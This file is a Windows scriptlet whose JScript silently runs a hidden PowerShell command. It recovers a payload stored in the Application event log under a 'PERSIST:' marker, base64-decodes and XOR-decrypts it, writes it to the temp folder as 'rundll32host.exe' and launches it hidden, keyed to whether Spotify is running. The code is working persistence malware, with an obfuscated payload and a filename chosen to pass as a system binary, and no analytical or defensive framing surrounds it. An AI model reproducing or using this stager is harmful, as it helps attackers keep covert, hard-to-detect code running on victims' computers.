<scriptlet>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tempDir = shell.ExpandEnvironmentStrings("%TEMP%");
var peFile = tempDir + "\\rundll32host.exe";

var psCmd = "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command \"" +
    "$pe='" + peFile + "';" +
    "$mx=New-Object System.Threading.Mutex($false,'Global\PersistenceSpotify');" +
    "if($mx.WaitOne(8000)){" +
    "try{" +
    "if(-not(Get-Process Spotify -EA 0)){" +
    "if(-not(Test-Path $pe) -or (Get-Item $pe).Length -eq 0){" +
    "Get-WinEvent -FilterHashtable @{LogName='Application';Id=19;ProviderName='Microsoft-Windows-Wininit'} -EA 0|" +
    "Where-Object{$_.Properties.Count -gt 0 -and $_.Properties[0].Value -clike 'PERSIST:*'}|" +
    "Select-Object -First 1|" +
    "ForEach-Object{$b64=$_.Properties[0].Value.Substring(8);" +
    "$b=[Convert]::FromBase64String($b64);" +
    "$k=0x77;for($i=0;$i-lt$b.Length;$i++){$b[$i]=$b[$i]-bxor $k;$k=($k+5)-band 0xFF};" +
    "[IO.File]::WriteAllBytes($pe,$b)}};" +
    "if(-not(Get-Process Spotify -EA 0) -and (Test-Path $pe) -and (Get-Item $pe).Length -gt 0){" +
    "Start-Process $pe -WindowStyle Hidden;" +
    "for($i=0;$i-lt10 -and -not(Get-Process Spotify -EA 0);$i++){Start-Sleep 500}}};" +
    "}finally{$mx.ReleaseMutex();$mx.Dispose()}}\"";

shell.Run(psCmd, 0, false);
</script>
</scriptlet>
